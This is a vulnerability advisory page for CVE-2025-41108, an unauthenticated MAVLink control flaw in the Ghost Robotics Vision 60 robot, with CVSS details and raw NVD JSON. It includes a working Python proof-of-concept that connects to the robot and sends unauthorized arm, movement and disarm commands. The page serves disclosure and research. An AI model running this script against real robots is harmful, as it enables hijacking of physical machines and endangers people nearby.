Security Vulnerability Report
CVE-2025-41108 CVSS 9.8 CRITICAL

CVE-2025-41108

Published: 2025-10-22 09:15:36
Last Modified: 2025-10-31 19:45:12

Description

The communication protocol implemented in Ghost Robotics Vision 60 v0.27.2 could allow an attacker to send commands to the robot from an external attack station, impersonating the control station (tablet) and gaining unauthorised full control of the robot. The absence of encryption and authentication mechanisms in the communication protocol allows an attacker to capture legitimate traffic between the robot and the controller, replicate it, and send any valid command to the robot from any attacking computer or device. The communication protocol used in this interface is based on MAVLink, a widely documented protocol, which increases the likelihood of attack. There are two methods for connecting to the robot remotely: Wi-Fi and 4G/LTE.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:ghostrobotics:vision_60_firmware:0.27.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:ghostrobotics:vision_60:-:*:*:*:*:*:*:* - NOT VULNERABLE
Ghost Robotics Vision 60 < v0.27.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-41108 - Ghost Robotics Vision 60 MAVLink Protocol Exploitation PoC
# This PoC demonstrates how an attacker can send unauthorized commands
# to a Ghost Robotics Vision 60 robot by exploiting the lack of
# authentication and encryption in the MAVLink communication protocol.

import socket
import time
from pymavlink import mavutil

# Target robot IP address (Wi-Fi or 4G/LTE network)
ROBOT_IP = "192.168.1.100"  # Default Vision 60 control station IP
ROBOT_PORT = 14550  # Default MAVLink port

# Create MAVLink connection (no authentication required)
master = mavutil.mavlink_connection(f'udp:{ROBOT_IP}:{ROBOT_PORT}')

# Wait for heartbeat from the robot
print("[*] Waiting for robot heartbeat...")
master.wait_heartbeat()
print(f"[+] Connected to robot system: {master.target_system}")


# Send arm/disarm command to demonstrate unauthorized control
def send_arm_command(arm_status=1):
    """Send ARM/DISARM command to the robot"""
    master.mav.command_long_send(
        master.target_system,
        master.target_component,
        mavutil.mavlink.MAV_CMD_COMPONENT_ARM_DISARM,
        0,  # confirmation
        arm_status,  # 1 = arm, 0 = disarm
        0, 0, 0, 0, 0, 0
    )
    print(f"[+] ARM command sent: {'ARMED' if arm_status else 'DISARMED'}")


# Send movement command to demonstrate full control
def send_movement_command(velocity_x, velocity_y, velocity_z):
    """Send velocity command to control robot movement"""
    master.mav.set_position_target_local_ned_send(
        0,  # time_boot_ms
        master.target_system,
        master.target_component,
        mavutil.mavlink.MAV_FRAME_LOCAL_NED,
        0b0000111111000111,  # type_mask (only velocities enabled)
        0, 0, 0,  # x, y, z positions
        velocity_x, velocity_y, velocity_z,  # vx, vy, vz velocities
        0, 0, 0,  # afx, afy, afz accelerations
        0, 0  # yaw, yaw_rate
    )
    print(f"[+] Movement command sent: vx={velocity_x}, vy={velocity_y}, vz={velocity_z}")


# Main exploitation sequence
if __name__ == "__main__":
    print("[*] CVE-2025-41108 Exploitation PoC")
    print("[*] Target: Ghost Robotics Vision 60")
    print("[*] Exploiting lack of authentication in MAVLink protocol...")

    # Step 1: Arm the robot without authorization
    send_arm_command(1)
    time.sleep(2)

    # Step 2: Send movement commands
    send_movement_command(1.0, 0.0, 0.0)  # Move forward
    time.sleep(3)
    send_movement_command(0.0, 0.0, 0.0)  # Stop
    time.sleep(1)

    # Step 3: Disarm the robot
    send_arm_command(0)
    print("[+] Exploitation complete - unauthorized control demonstrated")

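References

https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-ghost-robotics-vision-60 (Third Party Advisory)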

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-41108", "sourceIdentifier": "[email protected]", "published": "2025-10-22T09:15:36.423", "lastModified": "2025-10-31T19:45:12.163", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The communication protocol implemented in Ghost Robotics Vision 60 v0.27.2 could allow an attacker to send commands to the robot from an external attack station, impersonating the control station (tablet) and gaining unauthorised full control of the robot. The absence of encryption and authentication mechanisms in the communication protocol allows an attacker to capture legitimate traffic between the robot and the controller, replicate it, and send any valid command to the robot from any attacking computer or device. The communication protocol used in this interface is based on MAVLink, a widely documented protocol, which increases the likelihood of attack. There are two methods for connecting to the robot remotely: Wi-Fi and 4G/LTE."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", 
"modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:ghostrobotics:vision_60_firmware:0.27.2:*:*:*:*:*:*:*", "matchCriteriaId": "6C0D9971-6E9B-4F72-B650-A3FD0B004507"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:ghostrobotics:vision_60:-:*:*:*:*:*:*:*", "matchCriteriaId": "5E213EE6-FF18-4C56-8CE0-50E140A650E3"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-ghost-robotics-vision-60", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}